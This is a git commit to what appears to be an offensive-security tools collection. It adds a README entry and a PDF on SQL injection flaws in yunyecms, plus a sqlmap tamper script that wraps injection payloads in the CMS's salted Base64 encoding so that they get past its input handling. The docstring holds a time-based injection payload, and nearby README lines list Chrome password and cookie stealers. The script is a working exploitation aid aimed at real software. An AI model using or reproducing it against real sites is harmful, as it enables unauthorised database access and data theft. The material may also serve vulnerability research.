add 云业CMS(yunyecms)的多处SQL注入审计分析

2025-08-12 11:06:04 +00:00 · 2020-03-10 14:05:31 +08:00 · 2020-03-10 14:05:31 +08:00 · 4cef260a82
commit 4cef260a82
parent b4fd7e0059
3 changed files with 44 additions and 0 deletions
--- a/README.md
+++ b/README.md
@ -242,6 +242,7 @@
 - [chromepass-获取chrome保存的账号密码/cookies-nirsoft出品在win10+chrome 80测试OK](./tools/chromepass/)|[SharpChrome-基于.NET 2.0的开源获取chrome保存过的账号密码/cookies/history](https://github.com/djhohnstein/SharpChrome)|[ChromePasswords-开源获取chrome密码/cookies工具](https://github.com/malcomvetter/ChromePasswords)
 - [java-jdwp远程调试利用](https://github.com/Lz1y/jdwp-shellifier)|相关文章:[jdwp远程调试与安全](https://qsli.github.io/2018/08/12/jdwp/)
 - [社会工程学密码生成器，是一个利用个人信息生成密码的工具](https://github.com/zgjx6/SocialEngineeringDictionaryGenerator)
+- [sqlmap_yunyecms_front_sqli_tamp.py【云业CMS(yunyecms)的多处SQL注入审计分析中前台注入加密编码脚本】](./books/云业CMS(yunyecms)的多处SQL注入审计分析.pdf)|[原文地址](https://xz.aliyun.com/t/7302)|[官网下载地址](http://www.yunyecms.com/index.php?m=version&c=index&a=index)

 ## 书籍相关

--- a/books/云业CMS(yunyecms)的多处SQL注入审计分析.pdf
+++ b/books/云业CMS(yunyecms)的多处SQL注入审计分析.pdf
--- a/tools/sqlmap_yunyecms_front_sqli_tamp.py
+++ b/tools/sqlmap_yunyecms_front_sqli_tamp.py
@ -0,0 +1,43 @@
+#!/usr/bin/env python
+"""
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+import base64
+import hashlib
+from lib.core.enums import PRIORITY
+from lib.core.settings import UNICODE_ENCODING
+
+__priority__ = PRIORITY.LOW
+
+
+def dependencies():
+    pass
+
+
+def md5(data):
+    hash_md5 = hashlib.md5(data)
+    md5data = hash_md5.hexdigest()[8:18]
+    return md5data
+
+
+def sha1(data):
+    string_sha1 = hashlib.sha1(data).hexdigest()[0:35]
+    return string_sha1
+
+
+def yunyecms_strencode(string):
+    salt = '~^y#u%n$y^e*c%m^s^~'
+    return base64.b64encode(md5(salt) + base64.b64encode(string) + sha1(salt))
+
+
+def tamper(payload, **kwargs):
+    """
+    Base64-encodes all characters in a given payload
+
+    >>> tamper("1' AND SLEEP(5)#")
+    'MScgQU5EIFNMRUVQKDUpIw=='
+    """
+
+    return yunyecms_strencode(payload) if payload else payload